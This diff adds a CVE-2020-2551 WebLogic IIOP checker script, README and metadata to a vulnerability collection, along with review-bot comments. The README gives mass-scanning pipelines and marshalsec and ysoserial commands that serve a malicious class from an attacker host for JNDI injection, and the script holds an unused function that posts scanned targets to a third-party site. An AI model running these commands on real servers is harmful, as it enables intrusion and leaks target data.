diff --git a/cve/weblogic/2020/CVE-2020-2551/CVE-2020-2551.py b/cve/weblogic/2020/CVE-2020-2551/CVE-2020-2551.py
new file mode 100644
index 0000000000000000000000000000000000000000..c96ba6f700880ae7a941c2a83d197f83e04c91cb
--- /dev/null
+++ b/cve/weblogic/2020/CVE-2020-2551/CVE-2020-2551.py
@@ -0,0 +1,119 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+import socket,argparse,sys,requests,os,atexit
+from urllib.parse import urlparse
+from multiprocessing.dummy import Pool as ThreadPool
+"""
+only check CVE-2020-2551 vuls
+Twitter: @Hktalent3135773
+Creator: 51pwn_com
+Site: https://51pwn.com
+How use:
+python3 CVE-2020-2551.py -u http://192.168.26.79:7001
+# 32 Thread check
+cat allXXurl.txt|grep -Eo 'http[s]?:\/\/[^ \/]+'|sort -u|python3 CVE-2020-2551.py -e
+cat ../T3.txt rst/T3.txt|sort -u -r|py3 ~/mytools/CVE-2020-2551/CVE-2020-2551.py -e
+cat ../T3.txt rst/*.txt gy/*.txt|sort -u -r|py3 ~/mytools/CVE-2020-2551/CVE-2020-2551.py -e
+"""
+g_f = None
+
+bDebug=False
+g_oNRpt={}
+def log(e):
+ if bDebug:
+ print(e)
+def doThreads(fnCbk,lists,nThreads=64):
+ pool = ThreadPool(nThreads)
+ pool.map(fnCbk,lists)
+ pool.close()
+ pool.join()
+
+def checkOnline(url,cbkUrl):
+ try:
+ requests.post('http://51pwn.com/CVE-2020-2551/',data={'url':url,cbkUrl:cbkUrl},timeout=(5,9))
+ except Exception as e:
+ log(e)
+ pass
+
+def doSendOne(ip,port,data):
+ sock=None
+ res=None
+ s=ip+':'+str(port)
+ try:
+ if 0 == len(ip) or s in g_oNRpt:
+ return
+ g_oNRpt[s]='1'
+ sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ sock.settimeout(7)
+ server_addr = (ip, int(port))
+ sock.connect(server_addr)
+ sock.send(data)
+ res = sock.recv(10)
+ if b'GIOP' in res:
+ #checkOnline(ip+':'+str(port),'http://yourSite/?target={}&rst={}')
+ return True
+ except Exception as e:
+ log(s)
+ log(e)
+ pass
+ finally:
+ if sock!=None:
+ sock.close()
+ return False
+g_bPipe=False
+def doOne(url):
+ global g_bPipe,g_f
+ if not 'http' in url:
+ url='http://'+url
+ oH=urlparse(url)
+ a=oH.netloc.split(':')
+ port=80
+ if 2 == len(a):
+ port=a[1]
+ elif 'https' in oH.scheme:
+ port=443
+ if doSendOne(a[0],port,bytes.fromhex('47494f50010200030000001700000002000000000000000b4e616d6553657276696365')):
+ print('found CVE-2020-2551 ', oH.netloc)
+ g_f.write(oH.netloc + "\n")
+ g_f.flush()
+ elif g_bPipe == False:
+ print('not found CVE-2020-2551 ', oH.netloc)
+
+def doPipe():
+ global g_bPipe
+ g_bPipe=True
+ buff = ''
+ a=[]
+ while True:
+ buff = sys.stdin.readline()
+ if not buff:
+ break
+ if buff.endswith('\n'):
+ szTmpCmd = buff[:-1]
+ szTmpCmd=szTmpCmd.rstrip()
+ buff = ''
+ if not szTmpCmd:
+ break
+ a.append(szTmpCmd)
+ doThreads(doOne,a)
+
+def exit_handler():
+ global g_f
+ g_f.close()
+atexit.register(exit_handler)
+szFileOn = os.path.dirname(os.path.abspath(__file__))+ "/CVE-2020-2551.txt"
+if __name__=='__main__':
+ parser = argparse.ArgumentParser()
+ parser.add_argument("-u","--url",help="http://xxx.xxx.xxx:7001/")
+ parser.add_argument("-e","--pipeCheck",help="pipe check is Ok,thread 32",action="store_true")
+ parser.add_argument("-o","--out",help="out file name",default="CVE-2020-2551.txt")
+ args = parser.parse_args()
+ if args.out:
+ szFileOn=args.out
+ g_f = open(szFileOn,"a+")
+
+ if args.url:
+ doOne(args.url)
+ if args.pipeCheck:
+ doPipe()
\ No newline at end of file
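Review bot: `exit_handler` calls `g_f.close()` unconditionally, but `g_f` starts as `None` and is only opened after `parse_args()` in the `__main__` block, so any exit before that point (`-h`, an argparse error, or a run with no flags) raises AttributeError from the atexit hook; guard it with `if g_f is not None: g_f.close()`. The check `b'GIOP' in res` in `doSendOne` only establishes that the peer answered the probe with a GIOP reply, i.e. that an IIOP listener is reachable, not that the server is unpatched, so the `found CVE-2020-2551` message in `doOne` overstates the result; a comment such as `# positive result = IIOP endpoint answers with GIOP; confirm patch level separately` would keep users from reading it as a vulnerability confirmation. `checkOnline` posts every scanned target to a third-party host and, because `cbkUrl` is used as a dict key instead of `'cbkUrl'`, sends the callback URL under a wrong field; since its only call site is commented out, removing the function (and the `requests` import that only it needs) drops both the bug and an unexpected data-exfiltration path. Smaller points: the `-e` help text says 32 threads while `doThreads` defaults to 64, and `g_f.write` in `doOne` is called from all worker threads with no lock.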
diff --git a/cve/weblogic/2020/CVE-2020-2551/README.md b/cve/weblogic/2020/CVE-2020-2551/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..4253d57aa70692107409ddc8bddba7d4a439693d
--- /dev/null
+++ b/cve/weblogic/2020/CVE-2020-2551/README.md
@@ -0,0 +1,114 @@
+Twitter: [@Hktalent3135773](https://twitter.com/Hktalent3135773)
+[](https://twitter.com/intent/tweet?original_referer=https%3A%2F%2Fdeveloper.twitter.com%2Fen%2Fdocs%2Ftwitter-for-websites%2Ftweet-button%2Foverview&ref_src=twsrc%5Etfw&text=myhktools%20-%20Automated%20Pentest%20Recon%20Scanner%20%40Hktalent3135773&tw_p=tweetbutton&url=https%3A%2F%2Fgithub.com%2Fhktalent%2Fmyhktools)
+[](https://twitter.com/intent/follow?screen_name=Hktalent3135773)
+
+# 0、how get pro exploit tools?
+see https://github.com/hktalent/CVE-2020-2551/issues/5
+
+# 1、CVE-2020-2551
+CVE-2020-2551 poc exploit python example
+keys:
+GIOP corba
+
+
+
+### How use
+```
+python3 CVE-2020-2551.py -u http://192.168.26.79:7001
+cat urls.txt|sort -u|xargs -I % python3 CVE-2020-2551.py -u %
+cat xxx.html|grep -Eo 'http[s]?:\/\/[^ \/]+'|sort -u|xargs -I % python3 CVE-2020-2551.py -u %
+# 32 Thread check
+cat allXXurl.txt|grep -Eo 'http[s]?:\/\/[^ \/]+'|sort -u|python3 CVE-2020-2551.py -e
+# now result to data/*.txt
+java -cp hktalent_51pwn_com_12.1.3.0_check.jar testiiop.ExpCVE20202551_names ip:port ip:port
+java -cp hktalent_51pwn_com_12.2.1.3.0_check.jar testiiop.ExpCVE20202551_names ip:port ip:port
+```
+
+### t3, t3s, http, https, iiop, iiops
+```
+service:jmx:rmi://ip:port/jndi/iiop://ip:port/MBean-server-JNDI-name
+service:jmx:iiop://ip:port/jndi/weblogic.management.mbeanservers.domainruntime
+service:jmx:t3://ip:port/jndi/weblogic.management.mbeanservers.domainruntime
+```
+
+## poc
+
+
+
+
+# 2、your know your do
+```
+{
+ "ejb": {
+ "class": "com.sun.jndi.cosnaming.CNCtx",
+ "interfaces": [
+ "javax.naming.Context"
+ ],
+ "mgmt": {
+ "MEJB": {
+ "class": "com.sun.corba.se.impl.corba.CORBAObjectImpl",
+ "interfaces": []
+ },
+ "class": "com.sun.jndi.cosnaming.CNCtx",
+ "interfaces": [
+ "javax.naming.Context"
+ ]
+ }
+ },
+ "javax": {
+ "class": "com.sun.jndi.cosnaming.CNCtx",
+ "error msg": "org.omg.CORBA.NO_PERMISSION: vmcid: 0x0 minor code: 0 completed: No",
+ "interfaces": [
+ "javax.naming.Context"
+ ]
+ },
+ "jdbc": {
+ "class": "com.sun.jndi.cosnaming.CNCtx",
+ "db_xf": {
+ "class": "com.sun.corba.se.impl.corba.CORBAObjectImpl",
+ "interfaces": []
+ },
+ "interfaces": [
+ "javax.naming.Context"
+ ]
+ },
+ "mejbmejb_jarMejb_EO": {
+ "class": "com.sun.corba.se.impl.corba.CORBAObjectImpl",
+ "interfaces": []
+ },
+ "weblogic": {
+ "class": "com.sun.jndi.cosnaming.CNCtx",
+ "error msg": "org.omg.CORBA.NO_PERMISSION: vmcid: 0x0 minor code: 0 completed: No",
+ "interfaces": [
+ "javax.naming.Context"
+ ]
+ }
+}
+```
+
+# 3、ejb
+```
+/bea_wls_internal/classes/mejb@/
+
+weblogic.management.j2ee.mejb.Mejb_dj*#remove(Object obj)
+```
+
+# 4、jta
+```
+x.lookup("ejb/mgmt/MEJB").remove(jta);
+```
+# 5、logs
+- fix rmi use Jdk7u21 payload,not work for remote jdk8
+don‘t use
+```
+java -cp $mtx/../tools/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 1099 Jdk7u21 'whoami'
+```
+use,XXclass.class from jdk6 build
+```
+java -cp $mtx/../tools/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer 'http://YourIP:port/#XXclass' 1099
+```
+
+# 6、thanks for
+@[r4v3zn](https://github.com/r4v3zn)
+@[0nise](https://github.com/0nise)
+[](https://51pwn.com)
diff --git a/cve/weblogic/2020/yaml/CVE-2020-2551.yaml b/cve/weblogic/2020/yaml/CVE-2020-2551.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..a1540092a205e81a2bf4f1ff4dd15401397c5138
--- /dev/null
+++ b/cve/weblogic/2020/yaml/CVE-2020-2551.yaml
@@ -0,0 +1,20 @@
+id: CVE-2020-2551
+source: https://github.com/hktalent/CVE-2020-2551
+info:
+ name: WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。
+ severity: critical
+ description: |
+ 这次漏洞主要原因是错误的过滤JtaTransactionManager类,JtaTransactionManager父类AbstractPlatformTransactionManager在之前的补丁里面就加入到黑名单列表了,T3协议使用的是resolveClass方法去过滤的,resolveClass方法是会读取父类的,所以T3协议这样过滤是没问题的。但是IIOP协议这块,虽然也是使用的这个黑名单列表,但不是使用resolveClass方法去判断的,这样默认只会判断本类的类名,而JtaTransactionManager类是不在黑名单列表里面的,它的父类才在黑名单列表里面,这样就可以反序列化JtaTransactionManager类了,而JtaTransactionManager类是存在jndi注入的。
+ scope-of-influence:
+ weblogic 10.3.6.0.0, weblogic 12.1.3.0.0, weblogic 12.2.1.3.0, weblogic 12.2.1.4.0
+ reference:
+ - https://www.oracle.com/security-alerts/cpujan2020.html
+ - https://nvd.nist.gov/vuln/detail/CVE-2020-2551
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2020-2551
+ cwe-id: None
+ cnvd-id: None
+ kve-id: None
+ tags: cve2020, Weblogic, 反序列化
\ No newline at end of file
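Review bot: `cwe-id: None`, `cnvd-id: None` and `kve-id: None` are YAML string scalars rather than null values, so a consumer that tests for a missing identifier will see the literal text `None`; if the fields are intentionally empty, write `cwe-id: null` (or `~`) instead. Separately, `info.name` carries a paragraph-length product description while `description` holds the root-cause analysis; a short title in `name` (for example `name: Oracle WebLogic IIOP deserialization (CVE-2020-2551)`, a constructed sample) with the product text moved into `description` would keep `name` usable as a heading.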
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index 897401dfd5e870b030788445d302e79e80a5a840..d5e85d494242ec876707192a09db7c680814360e 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -54,6 +54,8 @@ cve:
- CVE-2019-3396
- CVE-2021-26084
- CVE-2022-26134
+ weblogic:
+ - CVE-2020-2551
polkit:
- CVE-2021-4034
vim: